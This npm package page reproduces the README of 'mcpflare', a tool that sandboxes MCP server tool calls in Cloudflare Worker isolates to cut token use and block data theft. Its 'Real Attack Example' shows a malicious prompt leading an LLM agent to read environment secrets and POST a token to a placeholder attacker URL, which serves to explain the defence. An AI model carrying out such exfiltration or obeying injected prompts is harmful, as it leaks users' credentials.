npm package discovery and stats viewer.

Discover Tips

  • General search

    [free text search, go nuts!]

  • Package details

    pkg:[package-name]

  • User packages

    @[username]

Sponsor

Optimize Toolset

I’ve always been into building performant and accessible sites, but lately I’ve been taking it extremely seriously. So much so that I’ve been building a tool to help me optimize and monitor the sites that I build to make sure that I’m making an attempt to offer the best experience to those who visit them. If you’re into performant, accessible and SEO friendly sites, you might like it too! You can check it out at Optimize Toolset.

About

Hi, 👋, I’m Ryan Hefner  and I built this site for me, and you! The goal of this site was to provide an easy way for me to check the stats on my npm packages, both for prioritizing issues and updates, and to give me a little kick in the pants to keep up on stuff.

As I was building it, I realized that I was actually using the tool to build the tool, and figured I might as well put this out there and hopefully others will find it to be a fast and useful way to search and browse npm packages as I have.

If you’re interested in other things I’m working on, follow me on Twitter or check out the open source projects I’ve been publishing on GitHub.

I am also working on a Twitter bot for this site to tweet the most popular, newest, random packages from npm. Please follow that account now and it will start sending out packages soon–ish.

Open Software & Tools

This site wouldn’t be possible without the immense generosity and tireless efforts from the people who make contributions to the world and share their work via open source initiatives. Thank you 🙏

© 2026 – Pkg Stats / Ryan Hefner

mcpflare

v1.1.1

Published

Use local MCP servers securely with zero-trust isolation while reducing context window token usage by up to 98%.

Readme

MCPflare

Use local MCP servers securely with zero-trust isolation while reducing context window token usage by up to 98%.

⚡ This implementation is based on Code execution with MCP: Building more efficient agents by Anthropic. It uses Wrangler for local MCP isolation using Dynamic Worker Loaders as described in Code Mode: the better way to use MCP by Cloudflare.

License: MIT TypeScript Node.js

🛡️ How It Works: A Simple Example

MCPflare Flowchart Overview

Real Attack Example

Scenario: Malicious prompt tries to steal your secrets

Traditional MCP:

User: "Show me all environment variables"
LLM: Calls read_env() tool
Result: ⚠️ SECRET_TOKEN=xxxxxxxxxxxx exposed
LLM: Exfiltrate SECRET_TOKEN via POST to "https://attacker.com/steal"
Result: ⚠️ Fetch request succeeds

With MCPflare:

User: "Show me all environment variables"
LLM: Writes code: console.log(process.env)
Result: ✅ ReferenceError: process is not defined
        Your secret stays safe
LLM: Exfiltrate SECRET_TOKEN via POST to "https://attacker.com/steal"
Result: ✅ Network access blocked

🔒 Security: Zero-Trust Execution

MCPflare runs all code in local Cloudflare Worker isolates with zero access to your filesystem, environment variables, network, or system, which protects against data exfiltration, credential theft, filesystem access, arbitrary code execution, process manipulation, SSRF attacks, code injection, supply chain attacks, and more.

Three layers of protection:

  1. V8 Isolate Sandboxing - Complete process isolation
  2. Network Isolation - No outbound network access, only MCP bindings can communicate
  3. Code Validation - Blocks dangerous patterns before execution

📖 Read the security analysis for attack vector details and defense-in-depth architecture.

⚡ Efficiency: Code Mode Execution

Traditional MCP tool calling wastes your context window. MCPflare uses code mode to reduce token usage by up to 98%.

Example: Generating a Jira Sprint Report

Traditional approach: The LLM calls tools step-by-step, and every result flows through the context window:

  1. Fetch 200 sprint tickets → 25,000 tokens loaded into context
  2. LLM reads all tickets to count completed vs blocked
  3. Fetch time tracking data → 5,000 tokens more
  4. Generate summary → 300 tokens

Total: 30,300 tokens just to count tickets and generate a simple report.

With MCPflare: The code runs in a secure sandbox, processes all 200 tickets, and only sends back the final summary. The LLM never has to read the individual tickets:

// Fetch tickets, filter and count in code, return only the summary
import * as jira from './servers/jira';

const tickets = await jira.getSprintTickets({ sprintId: '123' });
const stats = {
  completed: tickets.filter(t => t.status === 'Done').length,
  blocked: tickets.filter(t => t.labels.includes('blocked')).length,
  total: tickets.length
};

console.log(`Sprint Summary: ${stats.completed}/${stats.total} completed, ${stats.blocked} blocked`);

Result: Instead of 30,300 tokens, you use ~750 tokens. 97.5% reduction.

Benefits:

  • 📉 Up to 98% reduction in token usage
  • 🚀 60x more tasks in the same context window
  • 💰 Massive cost savings on LLM API calls
  • No round-trips for intermediate results

🏃 Quick Start

Requires: Node.js 20+ installed

Installation Steps

  1. Add MCPflare to your IDE config (Cursor, Claude Code, or GitHub Copilot):

    Install MCP Server

    Or manually add to your IDE's MCP configuration:

    {
      "mcpServers": {
        "mcpflare": {
          "command": "npx",
          "args": ["-y", "mcpflare"]
        }
      }
    }
  2. Disable existing MCPs (recommended):

    To maximize efficiency and security, disable any existing MCPs in your IDE configuration. This prevents the IDE from loading all their tools into the context window unnecessarily, which is one of MCPflare's key benefits - you only load and use the tools you actually need.

    Why disable?

    • Efficiency: Without disabling, your IDE loads all MCP tools into the context window, wasting tokens. MCPflare only loads tools lazily when you actually use them (via call_mcp or namespaced tool calls).
    • 🔒 Security: Ensures all tool calls route through MCPflare's secure isolation instead of being called directly.

    How to disable: Ask your LLM: "Disable all MCPs except mcpflare in my IDE configuration"

    This uses MCPflare's guard tool to move MCPs to a special _mcpflare_disabled section in your config file. MCPflare can still discover and use these disabled MCPs through its secure isolation layer.

    ⚠️ Important: Do NOT manually comment out or remove MCP entries from your config file. If you do, MCPflare won't be able to discover them. MCPflare needs the MCP configurations to remain in the file (either active or in the _mcpflare_disabled section) to route tool calls through secure isolation.

  3. Restart your IDE for changes to take effect.

  4. That's it! MCPflare automatically:

    • Discovers all other MCPs configured in your IDE (even disabled ones)
    • Routes all tool calls through secure Worker isolation
    • Lazy-loads MCPs when their tools are actually used (via call_mcp or namespaced tool calls)

No additional setup needed! MCPflare uses transparent proxy mode by default - all your existing MCPs are automatically guarded without any config changes (once they're disabled).

How Transparent Proxy Mode Works

MCPflare automatically:

  1. Discovers all MCPs configured in your IDE (Cursor, Claude Code, or GitHub Copilot)
  2. Lazy-loads tool schemas only when tools are actually called (not upfront - this keeps your context window efficient)
  3. Routes all tool calls through secure Worker isolation
  4. Auto-loads MCPs when their tools are first used

Example: If you have github MCP configured, MCPflare will:

  • When the LLM calls github::search_repositories, MCPflare automatically loads the GitHub MCP schema and executes the call in isolation
  • All results are returned transparently - the LLM doesn't need to know about the isolation layer
  • Tool schemas are cached after first use for faster subsequent calls

This means all MCP tool calls automatically go through MCPflare - no config changes needed!

You'll see a prompt like this:

╔═══════════════════════════════════════════════════════════╗
║              MCPflare - Interactive CLI                   ║
╚═══════════════════════════════════════════════════════════╝

Type "help" for available commands.
Type "exit" to quit.

mcpflare>

Basic Usage

  1. Load an MCP server:

    load

    Enter the MCP name, command (e.g., npx), args, and environment variables.

  2. Get the TypeScript API schema:

    schema

    Enter the MCP ID to see available tools as TypeScript APIs.

  3. Execute code:

    execute

    Enter the MCP ID and TypeScript code to run in the isolated Worker.

  4. List loaded MCPs:

    list

🧪 Testing with GitHub MCP

Follow these steps to test the system with GitHub MCP:

1. Start the CLI

npm run cli

2. Load the GitHub MCP Server

At the mcpflare> prompt, type:

load

You'll be prompted for information. Enter:

  • MCP name: github (or any name you like)
  • Command: npx
  • Args: -y,@modelcontextprotocol/server-github (comma-separated)
  • Environment variables: {"GITHUB_PERSONAL_ACCESS_TOKEN":"ghp_your_token_here"} (as JSON)

Example interaction:

mcpflare> load
MCP name: github
Command (e.g., npx): npx
Args (comma-separated, or press Enter for none): -y,@modelcontextprotocol/server-github
Environment variables as JSON (or press Enter for none): {"GITHUB_PERSONAL_ACCESS_TOKEN":"ghp_your_actual_token"}

Loading MCP server...

3. Check What Was Loaded

Type:

list

You should see your loaded MCP server with its ID, status, and available tools.

4. Get the TypeScript API Schema

Type:

schema

Enter the MCP ID from the previous step. You'll see the TypeScript API definitions that were generated from the MCP tools.

5. Execute Some Code

Type:

execute

You'll be prompted:

  • MCP ID: Enter the ID from step 3
  • TypeScript code: Enter your code (end with a blank line)
  • Timeout: Press Enter for default (30000ms)

Example code to test:

// Simple test
console.log('Hello from Worker isolate!');
const result = { message: 'Test successful', timestamp: Date.now() };
console.log(JSON.stringify(result));

6. View Metrics

Type:

metrics

This shows performance metrics including:

  • Total executions
  • Success rate
  • Average execution time
  • Estimated tokens saved

7. Clean Up

When done testing, unload the MCP:

unload

Enter the MCP ID to clean up resources.

📖 Available CLI Commands

| Command | Description | |---------|-------------| | load | Load an MCP server into an isolated Worker | | execute | Execute TypeScript code against a loaded MCP | | test | Interactively test MCP tools (select tool, enter args, execute via Wrangler) | | test-direct | Test MCP directly without Wrangler/Worker isolation | | list | List all loaded MCP servers | | saved | List all saved MCP configurations | | schema | Get TypeScript API schema for an MCP | | unload | Unload an MCP server and clean up | | conflicts | Check for IDE MCP configuration conflicts | | metrics | Show performance metrics | | help | Show help message | | exit | Exit the CLI |

🔧 Using as an MCP Server (for AI Agents)

Start the MCP server:

npm run dev

Configure your AI agent (Claude Desktop, Cursor IDE, etc.):

{
  "mcpServers": {
      "mcpflare": {
        "command": "node",
        "args": ["/path/to/mcpflare/dist/server/index.js"]
    }
  }
}

Available MCP Tools:

Transparent Proxy Tools (lazy-loaded from configured MCPs):

  • Tools from your configured MCPs are available with namespaced names (e.g., github::search_repositories)
  • Schemas are loaded on-demand when tools are called, keeping your context window efficient
  • All tool calls are routed through secure isolation

MCP Prompts (slash commands):

  • Prompts from your configured MCPs appear as slash commands (e.g., /mcpflare/github:AssignCodingAgent)
  • Prompts are read-only message templates, so they're directly proxied without worker isolation
  • All prompts are transparently aggregated and namespaced for easy discovery

MCPflare Management Tools:

  • call_mcp - Call MCP tools by running TypeScript code in a secure sandbox (auto-connects MCPs from IDE config if needed)
  • guard - Guard MCP servers by routing them through MCPflare's secure isolation
  • search_mcp_tools - Discover which MCPs are configured in your IDE. Shows all configured MCPs (including guarded) with their status and available tools.
  • connect - Manually connect to an MCP server (usually not needed - transparent proxy auto-connects)
  • list_available_mcps - List all currently connected MCP servers (runtime state)
  • get_mcp_by_name - Find a connected MCP server by name (more efficient than searching list_available_mcps)
  • get_mcp_schema - Get TypeScript API definition for a connected MCP
  • disconnect - Disconnect from an MCP server
  • import_configs - Import MCP configurations from IDE config files
  • get_metrics - Get performance metrics

📜 License

MIT License - see LICENSE file for details.

🙏 Acknowledgments

  • Anthropic for the Model Context Protocol
  • Cloudflare for Workers and the Worker Loader API
  • The MCP community for building amazing MCP servers

🔐 Repository Security (GitHub Advanced Security)

We take security seriously. This repository has GitHub Advanced Security features enabled, including CodeQL code scanning, Dependabot alerts, dependency graph/submission, and secret scanning + push protection. We also enable private vulnerability reporting so issues can be disclosed responsibly.

If you believe you’ve found a security issue, please see SECURITY.md for reporting instructions.


Ready to get started? Run npm install and then npm run cli to begin! 🚀